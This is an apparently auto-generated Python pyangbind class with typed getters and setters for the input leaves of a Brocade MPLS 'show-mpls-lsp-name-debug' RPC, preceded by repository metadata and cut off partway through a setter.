| 0.015394
| 0
| 0.581144
| 0
| 0
| 0.007384
| 0.001046
| 0
| 0
| 0
| 0
| 0.030912
| 1
| 0.004637
| false
| 0
| 0.006182
| 0
| 0.015456
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 8
| 7753f358815d1b2e9807fa02e6c169bc48260a63
| 123,976
| py
| Python
| pybind/slxos/v16r_1_00b/brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/__init__.py
| shivharis/pybind
| 4e1c6d54b9fd722ccec25546ba2413d79ce337e6
| ["Apache-2.0"] | null | null | null
| pybind/slxos/v16r_1_00b/brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/__init__.py
| shivharis/pybind
| 4e1c6d54b9fd722ccec25546ba2413d79ce337e6
| ["Apache-2.0"] | null | null | null
| pybind/slxos/v16r_1_00b/brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/__init__.py
| shivharis/pybind
| 4e1c6d54b9fd722ccec25546ba2413d79ce337e6
| ["Apache-2.0"] | 1
| 2021-11-05T22:15:42.000Z
| 2021-11-05T22:15:42.000Z
|
from operator import attrgetter
import pyangbind.lib.xpathhelper as xpathhelper
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType, RestrictedClassType, TypedListType
from pyangbind.lib.yangtypes import YANGBool, YANGListType, YANGDynClass, ReferenceType
from pyangbind.lib.base import PybindBase
from decimal import Decimal
from bitarray import bitarray
import __builtin__
class show_lsp_input_info(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module brocade-mpls - based on the path /brocade_mpls_rpc/show-mpls-lsp-name-debug/input/show-lsp-input-info. Each member element of
the container is represented as a class variable - with a specific
YANG type.
"""
__slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_rest_name', '_extmethods', '__lsp','__lsp_wide','__lsp_detail','__lsp_extensive','__lsp_debug','__lsp_name','__lsp_name_extensive','__lsp_name_debug','__bypass_lsp','__bypass_lsp_wide','__bypass_lsp_detail','__bypass_lsp_extensive','__bypass_lsp_debug','__bypass_lsp_name','__bypass_lsp_name_extensive','__bypass_lsp_name_debug','__bypass_lsp_static','__bypass_lsp_static_wide','__bypass_lsp_static_detail','__bypass_lsp_static_extensive','__bypass_lsp_static_debug','__bypass_lsp_static_name','__bypass_lsp_static_name_extensive','__bypass_lsp_static_name_debug','__bypass_lsp_dynamic','__bypass_lsp_dynamic_wide','__bypass_lsp_dynamic_detail','__bypass_lsp_dynamic_extensive','__bypass_lsp_dynamic_debug','__bypass_lsp_dynamic_name','__bypass_lsp_dynamic_name_extensive','__bypass_lsp_dynamic_name_debug','__lsp_input_lsp_name','__lsp_input_bypass','__lsp_input_dynamic','__lsp_input_brief','__lsp_input_wide','__lsp_input_detail','__lsp_input_extensive','__lsp_input_debug','__lsp_input_one','__lsp_input_all','__lsp_input_more',)
_yang_name = 'show-lsp-input-info'
_rest_name = ''
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
path_helper_ = kwargs.pop("path_helper", None)
if path_helper_ is False:
self._path_helper = False
elif path_helper_ is not None and isinstance(path_helper_, xpathhelper.YANGPathHelper):
self._path_helper = path_helper_
elif hasattr(self, "_parent"):
path_helper_ = getattr(self._parent, "_path_helper", False)
self._path_helper = path_helper_
else:
self._path_helper = False
extmethods = kwargs.pop("extmethods", None)
if extmethods is False:
self._extmethods = False
elif extmethods is not None and isinstance(extmethods, dict):
self._extmethods = extmethods
elif hasattr(self, "_parent"):
extmethods = getattr(self._parent, "_extmethods", None)
self._extmethods = extmethods
else:
self._extmethods = False
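    # Both fallback chains above resolve the same way: an explicit keyword
    # argument wins, otherwise the value is inherited from self._parent,
    # and otherwise the attribute defaults to False.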
self.__lsp_input_detail = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-input-detail", rest_name="lsp-input-detail", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
self.__lsp_input_wide = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-input-wide", rest_name="lsp-input-wide", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
self.__bypass_lsp_name_extensive = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-name-extensive", rest_name="bypass-lsp-name-extensive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
self.__lsp_name = YANGDynClass(base=unicode, is_leaf=True, yang_name="lsp-name", rest_name="lsp-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
self.__lsp_input_debug = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-input-debug", rest_name="lsp-input-debug", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
self.__lsp_wide = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-wide", rest_name="lsp-wide", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
self.__bypass_lsp_dynamic_debug = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-dynamic-debug", rest_name="bypass-lsp-dynamic-debug", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
self.__bypass_lsp_debug = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-debug", rest_name="bypass-lsp-debug", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
self.__lsp_input_more = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-input-more", rest_name="lsp-input-more", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
self.__bypass_lsp_static_name_extensive = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-static-name-extensive", rest_name="bypass-lsp-static-name-extensive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
self.__lsp_debug = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-debug", rest_name="lsp-debug", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
self.__lsp = YANGDynClass(base=unicode, is_leaf=True, yang_name="lsp", rest_name="lsp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
self.__bypass_lsp_static_wide = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-static-wide", rest_name="bypass-lsp-static-wide", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
self.__bypass_lsp_static_extensive = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-static-extensive", rest_name="bypass-lsp-static-extensive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
self.__bypass_lsp_name = YANGDynClass(base=unicode, is_leaf=True, yang_name="bypass-lsp-name", rest_name="bypass-lsp-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
self.__bypass_lsp_extensive = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-extensive", rest_name="bypass-lsp-extensive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
self.__bypass_lsp_static_name = YANGDynClass(base=unicode, is_leaf=True, yang_name="bypass-lsp-static-name", rest_name="bypass-lsp-static-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
self.__bypass_lsp_dynamic_name = YANGDynClass(base=unicode, is_leaf=True, yang_name="bypass-lsp-dynamic-name", rest_name="bypass-lsp-dynamic-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
self.__bypass_lsp = YANGDynClass(base=unicode, is_leaf=True, yang_name="bypass-lsp", rest_name="bypass-lsp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
self.__bypass_lsp_dynamic_wide = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-dynamic-wide", rest_name="bypass-lsp-dynamic-wide", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
self.__bypass_lsp_dynamic_extensive = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-dynamic-extensive", rest_name="bypass-lsp-dynamic-extensive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
self.__lsp_name_debug = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-name-debug", rest_name="lsp-name-debug", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
self.__lsp_input_lsp_name = YANGDynClass(base=unicode, is_leaf=True, yang_name="lsp-input-lsp-name", rest_name="lsp-input-lsp-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
self.__bypass_lsp_static_detail = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-static-detail", rest_name="bypass-lsp-static-detail", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
self.__bypass_lsp_static = YANGDynClass(base=unicode, is_leaf=True, yang_name="bypass-lsp-static", rest_name="bypass-lsp-static", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
self.__lsp_detail = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-detail", rest_name="lsp-detail", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
self.__lsp_name_extensive = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-name-extensive", rest_name="lsp-name-extensive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
self.__bypass_lsp_dynamic_detail = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-dynamic-detail", rest_name="bypass-lsp-dynamic-detail", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
self.__lsp_input_extensive = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-input-extensive", rest_name="lsp-input-extensive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
self.__bypass_lsp_dynamic_name_debug = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-dynamic-name-debug", rest_name="bypass-lsp-dynamic-name-debug", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
self.__bypass_lsp_dynamic = YANGDynClass(base=unicode, is_leaf=True, yang_name="bypass-lsp-dynamic", rest_name="bypass-lsp-dynamic", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
self.__bypass_lsp_detail = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-detail", rest_name="bypass-lsp-detail", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
self.__lsp_extensive = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-extensive", rest_name="lsp-extensive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
self.__lsp_input_dynamic = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-input-dynamic", rest_name="lsp-input-dynamic", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
self.__bypass_lsp_static_name_debug = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-static-name-debug", rest_name="bypass-lsp-static-name-debug", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
self.__lsp_input_one = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-input-one", rest_name="lsp-input-one", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
self.__lsp_input_all = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-input-all", rest_name="lsp-input-all", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
self.__bypass_lsp_static_debug = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-static-debug", rest_name="bypass-lsp-static-debug", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
self.__bypass_lsp_wide = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-wide", rest_name="bypass-lsp-wide", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
self.__lsp_input_brief = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-input-brief", rest_name="lsp-input-brief", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
self.__lsp_input_bypass = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-input-bypass", rest_name="lsp-input-bypass", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
self.__bypass_lsp_dynamic_name_extensive = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-dynamic-name-extensive", rest_name="bypass-lsp-dynamic-name-extensive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
self.__bypass_lsp_name_debug = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-name-debug", rest_name="bypass-lsp-name-debug", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
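    # Every attribute above wraps one YANG leaf of this container in a
    # YANGDynClass proxy that records its yang-name/rest-name, the
    # urn:brocade.com:mgmt:brocade-mpls namespace, and its YANG type
    # (YANGBool for boolean leaves, unicode for string leaves).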
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
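    # Copy-construction sketch (hedged, not part of the generated file):
    # given another object `other` exposing the same _pyangbind_elements,
    # the branch above copies each changed leaf through its generated
    # _set_<name>() method, e.g.
    #
    #   copy = show_lsp_input_info(other)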
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return [u'brocade_mpls_rpc', u'show-mpls-lsp-name-debug', u'input', u'show-lsp-input-info']
def _rest_path(self):
if hasattr(self, "_parent"):
if self._rest_name:
return self._parent._rest_path()+[self._rest_name]
else:
return self._parent._rest_path()
else:
return [u'show-mpls-lsp-name-debug', u'input']
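  # Sketch of the two path helpers when no parent is attached (both fall
  # through to their else branches):
  #
  #   obj = show_lsp_input_info()
  #   obj._path()       # [u'brocade_mpls_rpc', u'show-mpls-lsp-name-debug',
  #                     #  u'input', u'show-lsp-input-info']
  #   obj._rest_path()  # [u'show-mpls-lsp-name-debug', u'input']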
def _get_lsp(self):
"""
Getter method for lsp, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/lsp (string)
YANG Description: Show all lsps in brief
"""
return self.__lsp
def _set_lsp(self, v, load=False):
"""
Setter method for lsp, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/lsp (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_lsp() directly.
YANG Description: Show all lsps in brief
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="lsp", rest_name="lsp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="lsp", rest_name="lsp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)""",
})
self.__lsp = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp(self):
self.__lsp = YANGDynClass(base=unicode, is_leaf=True, yang_name="lsp", rest_name="lsp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
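  # Usage sketch for the generated accessor trio (hedged; a Python 2
  # session is assumed, since the module imports __builtin__ and relies
  # on unicode):
  #
  #   obj = show_lsp_input_info()
  #   obj._set_lsp(u'my-lsp')  # any value compatible with string
  #   obj._get_lsp()           # returns the YANGDynClass-wrapped value
  #   obj._unset_lsp()         # restores the default empty leaf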
def _get_lsp_wide(self):
"""
Getter method for lsp_wide, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/lsp_wide (boolean)
YANG Description: Show all lsps in brief and wide
"""
return self.__lsp_wide
def _set_lsp_wide(self, v, load=False):
"""
Setter method for lsp_wide, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/lsp_wide (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp_wide is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_lsp_wide() directly.
YANG Description: Show all lsps in brief and wide
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="lsp-wide", rest_name="lsp-wide", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_wide must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-wide", rest_name="lsp-wide", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)""",
})
self.__lsp_wide = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_wide(self):
self.__lsp_wide = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-wide", rest_name="lsp-wide", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
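  # Validation note: if the YANGBool base type rejects the supplied value,
  # the YANGDynClass call inside _set_lsp_wide raises TypeError or
  # ValueError, which its except clause converts into a ValueError carrying
  # the 'error-string', 'defined-type' and 'generated-type' keys seen above.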
def _get_lsp_detail(self):
"""
Getter method for lsp_detail, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/lsp_detail (boolean)
YANG Description: Show all lsps in detail
"""
return self.__lsp_detail
def _set_lsp_detail(self, v, load=False):
"""
Setter method for lsp_detail, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/lsp_detail (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp_detail is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_lsp_detail() directly.
YANG Description: Show all lsps in detail
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="lsp-detail", rest_name="lsp-detail", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_detail must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-detail", rest_name="lsp-detail", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)""",
})
self.__lsp_detail = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_detail(self):
self.__lsp_detail = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-detail", rest_name="lsp-detail", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
def _get_lsp_extensive(self):
"""
Getter method for lsp_extensive, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/lsp_extensive (boolean)
YANG Description: Show all lsps in extensive
"""
return self.__lsp_extensive
def _set_lsp_extensive(self, v, load=False):
"""
Setter method for lsp_extensive, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/lsp_extensive (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp_extensive is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_lsp_extensive() directly.
YANG Description: Show all lsps in extensive
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="lsp-extensive", rest_name="lsp-extensive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_extensive must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-extensive", rest_name="lsp-extensive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)""",
})
self.__lsp_extensive = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_extensive(self):
self.__lsp_extensive = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-extensive", rest_name="lsp-extensive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
def _get_lsp_debug(self):
"""
Getter method for lsp_debug, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/lsp_debug (boolean)
YANG Description: Show all lsps in extensive debug
"""
return self.__lsp_debug
def _set_lsp_debug(self, v, load=False):
"""
Setter method for lsp_debug, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/lsp_debug (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp_debug is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_lsp_debug() directly.
YANG Description: Show all lsps in extensive debug
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="lsp-debug", rest_name="lsp-debug", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_debug must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-debug", rest_name="lsp-debug", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)""",
})
self.__lsp_debug = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_debug(self):
self.__lsp_debug = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-debug", rest_name="lsp-debug", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
def _get_lsp_name(self):
"""
Getter method for lsp_name, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/lsp_name (string)
YANG Description: Show one lsp detailed info by name
"""
return self.__lsp_name
def _set_lsp_name(self, v, load=False):
"""
Setter method for lsp_name, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/lsp_name (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp_name is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_lsp_name() directly.
YANG Description: Show one lsp detailed info by name
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="lsp-name", rest_name="lsp-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_name must be of a type compatible with string""",
'defined-type': "string",
